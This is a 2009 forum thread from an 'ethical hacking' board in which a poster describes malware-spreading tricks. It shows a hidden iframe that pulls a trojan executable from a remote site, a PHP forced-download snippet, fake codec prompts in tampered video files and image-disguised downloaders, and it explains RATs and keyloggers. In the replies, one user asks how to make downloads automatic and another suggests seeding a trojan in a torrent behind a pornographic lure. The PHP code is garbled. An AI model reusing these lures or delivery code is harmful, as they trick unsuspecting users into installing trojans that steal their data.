1. We have moved from vBulletin to XenForo and you are viewing the site in the middle of the move. Though the functional aspect of everything is working fine, we are still working on other changes including the new design on Xenforo.
    Dismiss Notice

Different Techniques use to infect Malwares Around the internet!

Discussion in 'Ethical hacking Tips' started by P455w0rd_Cr4kz, Jan 13, 2009.

  1. P455w0rd_Cr4kz

    P455w0rd_Cr4kz New Member

    Before i start writing this small article i want to say that the presented information is for educational purposes and by no means Go4expert or myself takes any responsability for any misuse of the information and mentioned tools.

    However,i must say there are plenty more tactics,tools and tricks.

    Simply by using a php file,you can use it as a trojan/malware downloader.

    Iframe in HTML Method
    Example of this is:

    <html><head><title> </title></head><frameset rows="0,*">
    <frame src="http://webisite.com/CALC.EXE" name="top_frame" frameborder="0" scrolling="no" noresize="noresize" marginheight="0" marginwidth="0"/>
    Note CALC>exe (that would be the trojan)

    Octect/sockets en PHP Method

    With a php file you can use a short script to call your .exe file and ask for the download. Note that the PHP file and the EXE file must be in the same path,or you can also modify the path in the $flnm="file.exe"

    $size filesize($flnm);
    $fp fopen($flnm"r");
    $src fread($fp$size);
    header("Accept-Ranges: bytes\r\n");
    header("Content-Length: ".$size."\r\n");
    header("Content-Disposition: inline; filename=".$flnm);
    header("Content-Type: application/octet-stream\r\n\r\n");

    This Method is very popular this days.Nowadays you can spread malware by uploading tricked wmv files to limewire/ares and other file/moviews shared sites.

    With tools like the one shown below you can edit the wmv file to set up a stop time on the file and ask a user to download a fake codec.

    If you look closely,when the innocent user tries to watch the movie clip,it will show them a message asking for the download. Please see the picture below for a better idea.

    Be aware of your settings in your pc, do not download anything from a website you don't trust. Below is a picture of an old downloader that used the exploit on old IE/windos This Tool will create a downloader with an extension Jpeg including the picture icon


    The same exploits were used and were very popular couple of years back using a Html downloader. Please see below for a picture so you can have a better idea.



    These has been some of the most popular tools used time ago. Obviously and as you should be aware;the techniques are getting more sophisticated by the day.

    On purpose i have not mentioned any of the websites where you can download this tools. Researching is the most accurate way to be uptodate on this bad intentioned people tactics to make innocent internet users get inffected.

    Why would a hacker/script kiddie go thru all this programs and set up websites?

    It is very simple,once you get inffected with a RAT( remote Administration tools) they have complete access to your computer. All your most personal information is exposed to them. And......they can use your pc as a zombie to atack other sites via DDOS.

    Also understand that even with a simple Keylogger( keystroke Recorder) they could access all your emails,all your online banking sites,paypal and lots of your personal info.

    I hope this article was interesting for you. I am recovering at this moment from a very serious surgery,so please don't message me trying to get links for downloading this tools.
  2. TriG0rZ

    TriG0rZ New Member

    thanks for the info man, imo its always good to learn about how these tech were used in order to prevent them happening from you and they really are good for educational purpose's!
  3. Bhullarz

    Bhullarz New Member

    Really Nice one !!!
  4. hanleyhansen

    hanleyhansen New Member

    Great stuff!!
  5. shabbir

    shabbir Administrator Staff Member

  6. NDL

    NDL New Member

    Nice stuff
  7. indiansword

    indiansword Security Expert

    1 question in that php script if we include any exe file, will user be prompted to download it? is there any way for auto downloader??
  8. shabbir

    shabbir Administrator Staff Member

  9. asadullah.ansari

    asadullah.ansari TechCake

    It's really nice...
  10. indiansword

    indiansword Security Expert

    other way i cud suggest is put ur trojan and pack it in a torrent! put something good like aishwarya rai's xxx and all.. u get 1000s of downloads a day... and ur ftp is blown out because of logs :p
  11. shabbir

    shabbir Administrator Staff Member

Share This Page